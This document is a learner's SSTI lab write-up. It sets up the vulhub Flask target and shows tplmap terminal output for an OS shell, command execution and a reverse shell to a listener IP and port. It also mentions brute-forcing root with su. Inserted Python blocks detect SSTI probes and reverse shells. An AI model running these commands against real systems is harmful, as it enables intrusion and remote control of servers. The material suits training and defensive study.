SSTI penetration testing notes

Setting up the target environment

I used the vulhub collection here.

One-click install script (China mirror)

curl -sSL https://get.daocloud.io/docker | sh

After installation it should be usable directly as root; I added root to the docker user group.

Start docker

sudo systemctl start docker

Verify it works

sudo docker run hello-world

Enable it at system startup

sudo systemctl enable docker

Install docker-compose

pip install docker-compose

Download vulhub

git clone https://github.com/vulhub/vulhub.git

After entering flask/ssti, run docker-compose build && docker-compose up -d to start the container (chain the two commands with &&, not a single &, otherwise up starts before the build has finished).

Visit port 8000 of the host IP; if the following page appears, the container started successfully.

[image: ssti/image-20210116213526726.png]

Introduction to SSTI

SSTI stands for server-side template injection (roughly); for details refer to the article "一篇文章带你理解漏洞之SSTI漏洞".

Penetration attempt

SSTI requires guessing which parameters the target accepts, so an automated detection tool is a good choice; here I use tplmap.

I later found that tplmap can only tell whether a given parameter is injectable; it cannot discover which parameter names are injectable.

Installing tplmap

I use a Kali VM: git clone https://github.com/epinna/tplmap

I hit many problems installing pip along the way. A reminder: if you build it yourself, mind the versions.

To install pip, securely download get-pip.py from https://bootstrap.pypa.io/get-pip.py

Running python get-pip.py installs pip for the Python version you invoke it with.

I installed Python 3 first, which produced pip, pip3 and pip3.8.

Installing Python 2 afterwards overwrote pip, so the two coexist.

tplmap is Python 2.

After installing its requirements it is ready to use.

Trying tplmap

┌──(root💀kali)-[~/tplmap]
└─# ./tplmap.py -u  "http://115.154.173.197:57990/?name=aaa"
[+] Tplmap 0.5
    Automatic Server-Side Template Injection Detection and Exploitation Tool

[+] Testing if GET parameter 'name' is injectable
[+] Smarty plugin is testing rendering with tag '*'
[+] Smarty plugin is testing blind injection
[+] Mako plugin is testing rendering with tag '${*}'
[+] Mako plugin is testing blind injection
[+] Python plugin is testing rendering with tag 'str(*)'
[+] Python plugin is testing blind injection
[+] Tornado plugin is testing rendering with tag '{{*}}'
[+] Tornado plugin is testing blind injection
[+] Jinja2 plugin is testing rendering with tag '{{*}}'
[+] Jinja2 plugin has confirmed injection with tag '{{*}}'
[+] Tplmap identified the following injection point:

  GET parameter: name
  Engine: Jinja2
  Injection: {{*}}
  Context: text
  OS: posix-linux
  Technique: render
  Capabilities:

   Shell command execution: ok
   Bind and reverse shell: ok
   File write: ok
   File read: ok
   Code evaluation: ok, python code

[+] Rerun tplmap providing one of the following options:

    --os-shell                          Run shell on the target
    --os-cmd                            Execute shell commands
    --bind-shell PORT                   Connect to a shell bind to a target port
    --reverse-shell HOST PORT   Send a shell back to the attacker's port
    --upload LOCAL REMOTE       Upload files to the server
    --download REMOTE LOCAL     Download remote files

┌──(root💀kali)-[~/tplmap]
└─# ./tplmap.py -u "http://115.154.173.197:57990/?name=aaa" --os-shell
[+] Tplmap 0.5
    Automatic Server-Side Template Injection Detection and Exploitation Tool

[+] Testing if GET parameter 'name' is injectable
[+] Smarty plugin is testing rendering with tag '*'
[+] Smarty plugin is testing blind injection
[+] Mako plugin is testing rendering with tag '${*}'
[+] Mako plugin is testing blind injection
[+] Python plugin is testing rendering with tag 'str(*)'
[+] Python plugin is testing blind injection
[+] Tornado plugin is testing rendering with tag '{{*}}'
[+] Tornado plugin is testing blind injection
[+] Jinja2 plugin is testing rendering with tag '{{*}}'
[+] Jinja2 plugin has confirmed injection with tag '{{*}}'
[+] Tplmap identified the following injection point:

  GET parameter: name
  Engine: Jinja2
  Injection: {{*}}
  Context: text
  OS: posix-linux
  Technique: render
  Capabilities:

   Shell command execution: ok
   Bind and reverse shell: ok
   File write: ok
   File read: ok
   Code evaluation: ok, python code

[+] Run commands on the operating system.
posix-linux $ ls
app.py

As you can see, commands can now be executed from this terminal.

Alternatively, a command can be run directly:

./tplmap.py -u "http://115.154.173.197:57990/?name=aaa" --os-cmd "ls /"

Manual attempt

The above didn't achieve anything particularly useful, so let's try by hand to learn the underlying principle.

Didn't understand it (argh).

I roughly understood how the injection works: in Python, pick any class, find its base class, then find a class through which os can be imported, and use os to perform system operations. But it is rather tedious, so let's go back to tplmap.
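The class-traversal chain described above is why this vulnerability cannot be patched by blocking a single keyword: the root cause is that request data reaches the template source (for example Flask's render_template_string with the parameter concatenated into the string) instead of being passed as a template variable, and once an expression is evaluated, the whole object graph is reachable. Below is an added example, not part of the original post and not code from vulhub or tplmap, of the detection side: a small Python scanner that parses constructed web-server access-log lines, URL-decodes each query parameter and flags the probe shapes tplmap's plugins send (Jinja2/Tornado {{...}}, Mako ${...}) together with the Python attribute names that appear in the traversal chain. The sample log lines, the pattern list and every function name are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Probe shapes used by the template engines tplmap tests, plus the Python
# attribute names seen in the class-traversal chain described above.
# (This pattern list is an assumption for the example, not a complete rule set.)
SSTI_PATTERNS = [
    (re.compile(r"\{\{.*?\}\}", re.S), "jinja2/tornado expression"),
    (re.compile(r"\{%.*?%\}", re.S), "jinja2 statement"),
    (re.compile(r"\$\{.*?\}", re.S), "mako expression"),
    (re.compile(r"__(class|mro|subclasses|globals|builtins)__"), "python object traversal"),
]

# Combined-style access log line; only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample log (not taken from the page): one benign request,
# three probes of increasing depth, and one static-file request.
SAMPLE_LOG = """\
10.0.0.5 - - [16/Jan/2021:21:35:26 +0000] "GET /?name=aaa HTTP/1.1" 200 15
10.0.0.5 - - [16/Jan/2021:21:35:27 +0000] "GET /?name=%7B%7B7*7%7D%7D HTTP/1.1" 200 15
10.0.0.5 - - [16/Jan/2021:21:35:28 +0000] "GET /?name=%24%7B7*7%7D HTTP/1.1" 200 15
10.0.0.5 - - [16/Jan/2021:21:35:29 +0000] "GET /?name=%7B%7B%27%27.__class__.__mro__%7D%7D HTTP/1.1" 200 40
10.0.0.7 - - [16/Jan/2021:21:36:00 +0000] "GET /static/app.css HTTP/1.1" 200 512
"""


def parse_line(line):
    """Split one access-log line into its fields and decoded query parameters."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    # parse_qsl percent-decodes each value once; decode a second time so
    # double-encoded probes (%257B...) are normalised as well.
    rec["params"] = [(k, unquote_plus(v)) for k, v in
                     parse_qsl(urlsplit(rec["target"]).query, keep_blank_values=True)]
    return rec


def classify_value(value):
    """Return the labels of every probe pattern that matches a parameter value."""
    return [label for pat, label in SSTI_PATTERNS if pat.search(value)]


def scan_log(text):
    """Return one alert per (request, parameter) whose value looks like an SSTI probe."""
    alerts = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for key, value in rec["params"]:
            labels = classify_value(value)
            if labels:
                alerts.append({"ip": rec["ip"], "ts": rec["ts"], "param": key,
                               "value": value, "labels": labels})
    return alerts


if __name__ == "__main__":
    for a in scan_log(SAMPLE_LOG):
        print(f"{a['ts']} {a['ip']} param={a['param']!r} value={a['value']!r} "
              f"-> {', '.join(a['labels'])}")
```

Running the block on the constructed log reports the three probe requests and stays silent on the benign ones. On the application side the matching fix is to keep request data out of the template source entirely (render a fixed template and pass name as a context variable) and, where templates genuinely must come from users, to render them only under Jinja2's SandboxedEnvironment.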

tplmap revisited

We just tried --os-shell and --os-cmd to run commands, but a command that fails to execute produces no output, which is annoying. Next we use a reverse shell so that commands can be run from the local machine.

First I opened port 5656 locally, then:

┌──(root💀kali)-[~/tplmap]
└─# ./tplmap.py -u "http://115.154.173.197:57990/?name=aaa" --engine=jinja2 --reverse-shell 115.154.195.137 5656
[+] Tplmap 0.5
    Automatic Server-Side Template Injection Detection and Exploitation Tool

[+] Testing if GET parameter 'name' is injectable
[+] Jinja2 plugin is testing rendering with tag '{{*}}'
[+] Jinja2 plugin has confirmed injection with tag '{{*}}'
[+] Tplmap identified the following injection point:

  GET parameter: name
  Engine: Jinja2
  Injection: {{*}}
  Context: text
  OS: posix-linux
  Technique: render
  Capabilities:

   Shell command execution: ok
   Bind and reverse shell: ok
   File write: ok
   File read: ok
   Code evaluation: ok, python code

[+] Incoming connection accepted
/bin/sh: 0: can't access tty; job control turned off
$ ls

app.py
$ whoami

www-data
$ $ mkdir aa

mkdir: cannot create directory ‘aa’: Permission denied

As you can see, we can now enter commands directly from the local machine.

My guess at the mechanism: the target host opens a TCP connection, invokes bash, and redirects its input and output to that connection.

Running ps aux shows this is indeed the case.

[image: ssti/image-20210117121407894.png]

One advantage of this is that when permission is denied, it is clearly visible.
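A defender looking at the same ps aux output can turn the author's observation into a rule: a shell process descended from the web application process, running as the web user, with an interactive flag or with bash's /dev/tcp/ redirection in its command line, should not exist on a healthy Flask host. The following Python is an added example, not from the post and not tplmap's code, that parses a constructed snapshot in ps -eo user,pid,ppid,tty,args layout (the payload body of the suspicious process is elided, only the indicators are kept) and reports such processes. The process table, the WEB_APP_MARKERS list and all function names are assumptions made for this example.

```python
import os

# Names that identify the web application process on this host; an
# assumption for the example (the vulhub container runs "python app.py").
WEB_APP_MARKERS = ("app.py", "gunicorn", "uwsgi", "flask")
SHELLS = {"sh", "bash", "dash", "zsh", "ash"}
# bash can open sockets by redirecting to these pseudo-paths, which is the
# mechanism the author observed in ps aux.
NET_REDIRECTS = ("/dev/tcp/", "/dev/udp/")

# Constructed snapshot in `ps -eo user,pid,ppid,tty,args` layout (not the
# page's screenshot). The payload body of pid 42 is deliberately elided;
# only the indicators a detector keys on are kept. 203.0.113.10 is a
# documentation address standing in for the listener host.
SAMPLE_PS = """\
USER       PID  PPID TT       COMMAND
root         1     0 ?        /bin/bash /docker-entrypoint.sh
www-data    17     1 ?        python app.py
www-data    42    17 ?        /bin/sh -c bash -i [payload elided] /dev/tcp/203.0.113.10/5656
www-data    43    42 ?        bash -i
root        58     1 pts/0    ps -eo user,pid,ppid,tty,args
"""


def parse_ps(text):
    """Parse the snapshot into {pid: {user, ppid, tty, args}}; skips the header."""
    procs = {}
    for line in text.splitlines():
        parts = line.split(None, 4)
        if len(parts) < 5 or parts[0] == "USER":
            continue
        user, pid, ppid, tty, args = parts
        procs[int(pid)] = {"user": user, "ppid": int(ppid), "tty": tty, "args": args}
    return procs


def is_shell(args):
    """True when the executable (first token) is a known shell."""
    return os.path.basename(args.split()[0]) in SHELLS


def web_app_ancestor(procs, pid):
    """Return the pid of the first ancestor that looks like the web app, else None."""
    seen = set()
    cur = procs[pid]["ppid"]
    while cur in procs and cur not in seen:
        seen.add(cur)
        if any(m in procs[cur]["args"] for m in WEB_APP_MARKERS):
            return cur
        cur = procs[cur]["ppid"]
    return None


def detect_reverse_shells(procs):
    """Flag shell processes that a web server should never have spawned."""
    findings = []
    for pid in sorted(procs):
        p = procs[pid]
        if not is_shell(p["args"]):
            continue
        reasons = []
        anc = web_app_ancestor(procs, pid)
        if anc is not None:
            reasons.append(f"shell descended from web app process pid {anc}")
        if "-i" in p["args"].split():
            reasons.append("interactive shell flag -i")
        for ind in NET_REDIRECTS:
            if ind in p["args"]:
                reasons.append(f"network redirection via {ind}")
        if reasons:
            findings.append({"pid": pid, "user": p["user"],
                             "args": p["args"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in detect_reverse_shells(parse_ps(SAMPLE_PS)):
        print(f"pid {f['pid']} ({f['user']}): {f['args']}")
        for r in f["reasons"]:
            print("   -", r)
```

On the constructed table the container's own entrypoint shell (pid 1) is not reported, because it has no web-app ancestor, no interactive flag and no socket redirection; the two shells under python app.py are. The same three checks map directly onto process-creation telemetry (auditd execve records or an EDR's process tree), where the parent relationship is far more reliable than a one-off ps snapshot.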

The only next step I can think of is using su to brute-force the root account password.

Besides that there are also --bind-shell PORT, --upload LOCAL REMOTE and --download REMOTE LOCAL, but my attempts at those failed, hahaha.

Summary

I now understand the principle of SSTI attacks and have a basic grasp of installing and using tplmap.

Although I can't think of what else to do next, this counts as a first step into the subject.

Also:

The theory is really hard; being a script kiddie feels great.
